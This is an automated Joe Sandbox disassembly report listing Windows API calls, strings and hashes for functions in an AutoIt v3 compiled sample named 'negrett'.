Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ee1d7130b66b774990c81d9a94e3b3ce86325961b44a4192450635b5f009c3f1
Instruction ID: ee34b580dd682382e7df754aa0251edbdf2a272d356b727c9545736e83c30d1a
Opcode Fuzzy Hash: ee1d7130b66b774990c81d9a94e3b3ce86325961b44a4192450635b5f009c3f1
Instruction Fuzzy Hash: 19027B71A00205EFDB14DF68CC89EAE7BF9EF49710F148598F915AB2A1DB70AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B28D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00B28E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B66AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B66AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B66F43

Part of subcall function 00B28F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00B28FC5

SendMessageW.USER32(?,00001053), ref: 00B66F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B66F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B66FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00B66FB7

Strings

0, xrefs: 00B66DCF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: d99b7235bd7e8541679760fbab8bdbf70717f6a91bd15fb635768aeb321eb643
Instruction ID: 125ab60b5e3225d0b5473bb6631807fd20e218c89185d8a50e3b15a0ef2a9ae0
Opcode Fuzzy Hash: d99b7235bd7e8541679760fbab8bdbf70717f6a91bd15fb635768aeb321eb643
Instruction Fuzzy Hash: EE12D034601251EFDB25DF18D885BAABBE1FB45300F1844A9F489CB262CB36EC52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B92711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00B9273E
SystemParametersInfoW.USER32 ref: 00B9286A
SetRect.USER32 ref: 00B928A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B928B9
CreateWindowExW.USER32 ref: 00B92900
GetClientRect.USER32 ref: 00B9290C
CreateWindowExW.USER32 ref: 00B92955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B92964
GetStockObject.GDI32(00000011), ref: 00B92974
SelectObject.GDI32(00000000,00000000), ref: 00B92978
GetTextFaceW.GDI32(00000000,00000040,?), ref: 00B92988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B92991
DeleteDC.GDI32(00000000), ref: 00B9299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B929C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B929DD
CreateWindowExW.USER32 ref: 00B92A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B92A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B92A42
CreateWindowExW.USER32 ref: 00B92A77
GetStockObject.GDI32(00000011), ref: 00B92A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B92A8D
ShowWindow.USER32(00000004), ref: 00B92A97

Strings

static, xrefs: 00B9294F, 00B92A71
msctls_progress32, xrefs: 00B92A13
DISPLAY, xrefs: 00B9295A
AutoIt v3, xrefs: 00B928F8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 46073dc5e5411a888ee19ab6d6525d01f750eaa2946c2da6876907abe4dcc675
Instruction ID: 1c4fc60cad970e91725830b714524bdecd697d6db09ccfbd006b923dcb0132ea
Opcode Fuzzy Hash: 46073dc5e5411a888ee19ab6d6525d01f750eaa2946c2da6876907abe4dcc675
Instruction Fuzzy Hash: 7DB14C71A40215BFEB14DFA8CC8AEAE7BF9EB09710F104554F915EB290DB74AD40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B84ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B84AED
GetDriveTypeW.KERNEL32(?,00BACB68,?,\\.\,00BACC08), ref: 00B84BCA
SetErrorMode.KERNEL32(00000000,00BACB68,?,\\.\,00BACC08), ref: 00B84D36

Strings

Virtual, xrefs: 00B84CE5
SSD, xrefs: 00B84C4A
\\.\, xrefs: 00B84B3F
RAMDisk, xrefs: 00B84BF4
Removable, xrefs: 00B84C10, 00B84C15
iSCSI, xrefs: 00B84CC2
SCSI, xrefs: 00B84C8A
Fixed, xrefs: 00B84C09
RAID, xrefs: 00B84CBB
MMC, xrefs: 00B84CDE
CDROM, xrefs: 00B84BFB
ATAPI, xrefs: 00B84C91
SSA, xrefs: 00B84CA6
USB, xrefs: 00B84CB4
SATA, xrefs: 00B84CD0
ATA, xrefs: 00B84C98
Fibre, xrefs: 00B84CAD
Unknown, xrefs: 00B84BED, 00B84C83
SAS, xrefs: 00B84CC9
1394, xrefs: 00B84C9F
FileBackedVirtual, xrefs: 00B84CEC
PhysicalDrive, xrefs: 00B84B76
Network, xrefs: 00B84C02

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 30287259e53c4fd72741b9b89fe8dd4f63786af06cbde59d058435da2e581125
Instruction ID: d34d1cb0fe6b2972dc1c38648f114cad5216569085af3e23213df009054ee1c4
Opcode Fuzzy Hash: 30287259e53c4fd72741b9b89fe8dd4f63786af06cbde59d058435da2e581125
Instruction Fuzzy Hash: 5B618030605207ABCB04EF24DAC29A9B7F5EB05340B2484E6F806AB7B1EB75ED41DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00BA0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BA02E5
_wcslen.LIBCMT ref: 00BA031F
_wcslen.LIBCMT ref: 00BA0389
_wcslen.LIBCMT ref: 00BA03F1
_wcslen.LIBCMT ref: 00BA0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BA04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA0504

Part of subcall function 00B2F9F2: _wcslen.LIBCMT ref: 00B2F9FD

Part of subcall function 00B7223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B72258
Part of subcall function 00B7223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B7228A

Strings

FINDITEM, xrefs: 00BA0627
ISSELECTED, xrefs: 00BA04DD
VIEWCHANGE, xrefs: 00BA0675
GETSELECTEDCOUNT, xrefs: 00BA0470, 00BA048B
GETITEMCOUNT, xrefs: 00BA0316, 00BA0337
SELECTALL, xrefs: 00BA0515
SELECTCLEAR, xrefs: 00BA052D
SELECT, xrefs: 00BA0548
GETTEXT, xrefs: 00BA03EC, 00BA0407
SELECTINVERT, xrefs: 00BA057E
GETSUBITEMCOUNT, xrefs: 00BA0384, 00BA039F
DESELECT, xrefs: 00BA059C
GETSELECTED, xrefs: 00BA05E1

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 1ce63c110c09d2be590369c6455f6a841b8229ed804ad6e896d555c5dcd81c23
Instruction ID: fb5ebd11b717cba0769a74948fd64fd0839ad44369bab447cd7b5d5cdc4c1fb7
Opcode Fuzzy Hash: 1ce63c110c09d2be590369c6455f6a841b8229ed804ad6e896d555c5dcd81c23
Instruction Fuzzy Hash: F9E1A0312282019FC714EF28C49196AB7E6FF99314F5449EDF8969B3A1EB30ED45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B28891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00B28968
GetSystemMetrics.USER32 ref: 00B28970
SystemParametersInfoW.USER32 ref: 00B2899B
GetSystemMetrics.USER32 ref: 00B289A3
GetSystemMetrics.USER32 ref: 00B289C8
SetRect.USER32 ref: 00B289E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B289F5
CreateWindowExW.USER32 ref: 00B28A28
SetWindowLongW.USER32 ref: 00B28A3C
GetClientRect.USER32 ref: 00B28A5A
GetStockObject.GDI32(00000011), ref: 00B28A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B28A81

Part of subcall function 00B2912D: GetCursorPos.USER32(?), ref: 00B29141
Part of subcall function 00B2912D: ScreenToClient.USER32(00000000,?), ref: 00B2915E
Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B29183
Part of subcall function 00B2912D: GetAsyncKeyState.USER32 ref: 00B2919D

SetTimer.USER32(00000000,00000000,00000028,00B290FC), ref: 00B28AA8

Strings

AutoIt v3 GUI, xrefs: 00B28A20

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 4d77986959051c40fc0c62499c37394d0a2b3a968de18453feda29fba50c7f28
Instruction ID: 3b5a7281fc9a04f7ec96f5a820763133cdb733d1a00d97f32dc0151dc21a41a2
Opcode Fuzzy Hash: 4d77986959051c40fc0c62499c37394d0a2b3a968de18453feda29fba50c7f28
Instruction Fuzzy Hash: 67B18D35A002199FDB14DFA8DD86BAE3BF5FB48314F104269FA19AB290DB34E841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B70D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B71114
Part of subcall function 00B710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71120
Part of subcall function 00B710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B7112F
Part of subcall function 00B710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B70B9B,?,?,?), ref: 00B71136
Part of subcall function 00B710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B7114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B70DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B70E29
GetLengthSid.ADVAPI32(?), ref: 00B70E40
GetAce.ADVAPI32(?,00000000,?), ref: 00B70E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B70E96
GetLengthSid.ADVAPI32(?), ref: 00B70EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B70EB5
HeapAlloc.KERNEL32(00000000), ref: 00B70EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B70EDD
CopySid.ADVAPI32(00000000), ref: 00B70EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B70F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B70F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B70F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70F6E
HeapFree.KERNEL32(00000000), ref: 00B70F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70F7E
HeapFree.KERNEL32(00000000), ref: 00B70F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B70F8E
HeapFree.KERNEL32(00000000), ref: 00B70F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00B70FA1
HeapFree.KERNEL32(00000000), ref: 00B70FA8

Part of subcall function 00B71193: GetProcessHeap.KERNEL32(00000008,00B70BB1,?,00000000,?,00B70BB1,?), ref: 00B711A1
Part of subcall function 00B71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B70BB1,?), ref: 00B711A8
Part of subcall function 00B71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B70BB1,?), ref: 00B711B7

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8a227102de75ef37bcd1bf5bd93d08026857a25ad1f0539110a0a49dc931ab9e
Instruction ID: 9f9176212bebaf426c27ccbaed4a9a2a73d630189f8844be67bd28d030acd702
Opcode Fuzzy Hash: 8a227102de75ef37bcd1bf5bd93d08026857a25ad1f0539110a0a49dc931ab9e
Instruction Fuzzy Hash: 37713C7291020AEBDF20EFA4DC45FAEBBB8FF05310F148556F929AB191DB719905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B9C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B9C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00BACC08,00000000,?,00000000,?,?), ref: 00B9C544
RegCloseKey.ADVAPI32(00000000), ref: 00B9C5A4
_wcslen.LIBCMT ref: 00B9C5F4
_wcslen.LIBCMT ref: 00B9C66F
RegSetValueExW.ADVAPI32 ref: 00B9C6B2
RegSetValueExW.ADVAPI32 ref: 00B9C7C1
RegSetValueExW.ADVAPI32 ref: 00B9C84D
RegCloseKey.ADVAPI32(?), ref: 00B9C881
RegCloseKey.ADVAPI32(00000000), ref: 00B9C88E
RegSetValueExW.ADVAPI32 ref: 00B9C960

Strings

REG_DWORD, xrefs: 00B9C804
REG_MULTI_SZ, xrefs: 00B9C6F5
REG_QWORD, xrefs: 00B9C8C3
REG_BINARY, xrefs: 00B9C913
REG_EXPAND_SZ, xrefs: 00B9C5CD
REG_SZ, xrefs: 00B9C644

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: c9a584e7fc3ba366bd16ccf8135f0e45bfbafb67dd2a87c6e30bb510fa5edbb2
Instruction ID: 25acf19c1470884845afde897209fdc633494cff4e9fb6fd483fb22fb85b2862
Opcode Fuzzy Hash: c9a584e7fc3ba366bd16ccf8135f0e45bfbafb67dd2a87c6e30bb510fa5edbb2
Instruction Fuzzy Hash: A61259356042019FDB14DF14C891A6ABBE5FF88714F1588ADF89A9B3A2DB31FD41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00BA091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BA09C6
_wcslen.LIBCMT ref: 00BA0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BA0A54
_wcslen.LIBCMT ref: 00BA0A8A
_wcslen.LIBCMT ref: 00BA0B06
_wcslen.LIBCMT ref: 00BA0B81

Part of subcall function 00B2F9F2: _wcslen.LIBCMT ref: 00B2F9FD

Part of subcall function 00B72BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B72BFA

Strings

CHECK, xrefs: 00BA0A85, 00BA0AA0
ISCHECKED, xrefs: 00BA0CE1
SELECT, xrefs: 00BA0D11
COLLAPSE, xrefs: 00BA0B01, 00BA0B1C
GETTEXT, xrefs: 00BA0C97
UNCHECK, xrefs: 00BA0D3E
EXISTS, xrefs: 00BA0B7C, 00BA0B97
GETITEMCOUNT, xrefs: 00BA0C1E
EXPAND, xrefs: 00BA0BF8
GETSELECTED, xrefs: 00BA0C4E
GETTOTALCOUNT, xrefs: 00BA09F2, 00BA0A17

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: d14125a27e1b15e84ffeb0c7f37406d6052d4009080643645647c92c3447c97c
Instruction ID: 017e9fc555f5a774f6a7f801165e2c8fd96c1bf3d20be6410ad5e72152832f08
Opcode Fuzzy Hash: d14125a27e1b15e84ffeb0c7f37406d6052d4009080643645647c92c3447c97c
Instruction Fuzzy Hash: 52E159322183019FC714EF24C49096AB7E2FF99314F5489ADF89A9B362DB31ED45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B9C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B9C9B5
_wcslen.LIBCMT ref: 00B9C9F1
_wcslen.LIBCMT ref: 00B9CA68
_wcslen.LIBCMT ref: 00B9CA9E
_wcslen.LIBCMT ref: 00B9CAF9
_wcslen.LIBCMT ref: 00B9CB2F
_wcslen.LIBCMT ref: 00B9CB7F

Strings

HKLM, xrefs: 00B9CA98, 00B9CA9D
HKCU, xrefs: 00B9CBCE
HKEY_CURRENT_CONFIG, xrefs: 00B9CB79, 00B9CB7E
HKEY_LOCAL_MACHINE, xrefs: 00B9CA62, 00B9CA67
HKCC, xrefs: 00B9CBAC
HKEY_USERS, xrefs: 00B9CBDF
HKU, xrefs: 00B9CBF0
HKCR, xrefs: 00B9CB29, 00B9CB2E
HKEY_CURRENT_USER, xrefs: 00B9CBBD
HKEY_CLASSES_ROOT, xrefs: 00B9CAF3, 00B9CAF8

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 844a18fed20ce2fe916edf8826e094e644afeda87b1118a3f1ac2ca9a1c93700
Instruction ID: 9acdeec1cbafa0e88c1de9029ec0b3838f26e18236fac6e481a23198096201b8
Opcode Fuzzy Hash: 844a18fed20ce2fe916edf8826e094e644afeda87b1118a3f1ac2ca9a1c93700
Instruction Fuzzy Hash: E671F33360016A8BCF20DE7CC9915FE3BE1EB61764B6145F9F85697289FA30CD8183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BA835A
_wcslen.LIBCMT ref: 00BA836E
_wcslen.LIBCMT ref: 00BA8391
_wcslen.LIBCMT ref: 00BA83B4
LoadImageW.USER32 ref: 00BA83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BA5BF2), ref: 00BA844E
LoadImageW.USER32 ref: 00BA8487
LoadImageW.USER32 ref: 00BA84CA
LoadImageW.USER32 ref: 00BA8501
FreeLibrary.KERNEL32(?), ref: 00BA850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BA851D
DestroyIcon.USER32(?,?,?,?,?,00BA5BF2), ref: 00BA852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BA8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BA8555

Strings

.dll, xrefs: 00BA83AB
.icl, xrefs: 00BA8368
.exe, xrefs: 00BA8388

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 98f0432954b0db89cdde02101411f9fa8fd693402197fea811aa4e1e5685579d
Instruction ID: 84a71ae04679aeb53057ac25ff8ad3379301f69baced1d8bf625968af0ef87b5
Opcode Fuzzy Hash: 98f0432954b0db89cdde02101411f9fa8fd693402197fea811aa4e1e5685579d
Instruction Fuzzy Hash: 0761E171944205BEEB14DF64CC86BBE7BE8FB19721F10468AF815DA1D1EF74A980C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B300C6

Part of subcall function 00B300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00BE070C,00000FA0,5D8A404D,?,?,?,?,00B523B3,000000FF), ref: 00B3011C
Part of subcall function 00B300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B523B3,000000FF), ref: 00B30127
Part of subcall function 00B300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B523B3,000000FF), ref: 00B30138
Part of subcall function 00B300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00B523B3,000000FF), ref: 00B3014E
Part of subcall function 00B300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00B523B3,000000FF), ref: 00B3015C
